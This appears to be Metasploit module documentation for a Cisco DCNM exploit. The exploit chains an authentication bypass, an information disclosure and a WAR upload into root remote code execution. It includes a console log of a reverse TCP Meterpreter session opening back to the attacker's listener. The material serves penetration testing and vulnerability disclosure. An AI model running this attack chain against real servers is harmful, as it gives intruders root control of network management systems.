2020-01-20 21:26:59 -05:00
|
|
|
## Vulnerable Application
|
2019-08-29 22:45:03 +07:00
|
|
|
|
|
|
|
|
Cisco Data Center Network Manager exposes a file upload servlet (FileUploadServlet) at /fm/fileUpload.
|
|
|
|
|
An authenticated user can abuse this servlet to upload a WAR to the Apache Tomcat webapps
|
|
|
|
|
directory and achieve remote code execution as root.
|
|
|
|
|
|
|
|
|
|
This module exploits two other vulnerabilities, CVE-2019-1619 for authentication bypass on
|
|
|
|
|
versions 10.4(2) and below, and CVE-2019-1622 (information disclosure) to obtain the correct
|
|
|
|
|
directory for the WAR file upload.
|
|
|
|
|
|
|
|
|
|
The module was tested on the DCNM Linux virtual appliance 10.4(2), 11.0(1) and 11.1(1), and should
|
|
|
|
|
work on a few versions below 10.4(2). Only version 11.0(1) requires authentication to exploit
|
|
|
|
|
(see References to understand why).
|
|
|
|
|
|
2020-01-20 21:26:59 -05:00
|
|
|
## Scenarios
|
2019-08-29 22:45:03 +07:00
|
|
|
|
|
|
|
|
Setup RHOST, LHOST, LPORT, run it and sit back!
|
|
|
|
|
|
|
|
|
|
```
|
|
|
|
|
[*] Started reverse TCP handler on 10.75.1.1:4444
|
|
|
|
|
[+] 10.75.1.40:443 - Detected DCNM 11.1(1)
|
|
|
|
|
[*] 10.75.1.40:443 - No authentication required, ready to exploit!
|
|
|
|
|
[+] 10.75.1.40:443 - Obtain WAR path from logs: /usr/local/cisco/dcm/wildfly-10.1.0.Final/standalone/sandeployments
|
|
|
|
|
[*] 10.75.1.40:443 - Uploading payload...
|
|
|
|
|
[+] 10.75.1.40:443 - WAR uploaded, waiting a few seconds for deployment...
|
|
|
|
|
[*] 10.75.1.40:443 - Executing payload...
|
|
|
|
|
[*] Sending stage (53867 bytes) to 10.75.1.40
|
|
|
|
|
[*] Meterpreter session 1 opened (10.75.1.1:4444 -> 10.75.1.40:60592) at 2019-08-29 12:41:49 +0700
|
|
|
|
|
|
|
|
|
|
meterpreter > getuid
|
|
|
|
|
Server username: root
|
|
|
|
|
meterpreter > exit
|
|
|
|
|
[*] Shutting down Meterpreter...
|
|
|
|
|
[*] 10.75.1.40 - Meterpreter session 1 closed. Reason: User exit
|
|
|
|
|
```
|
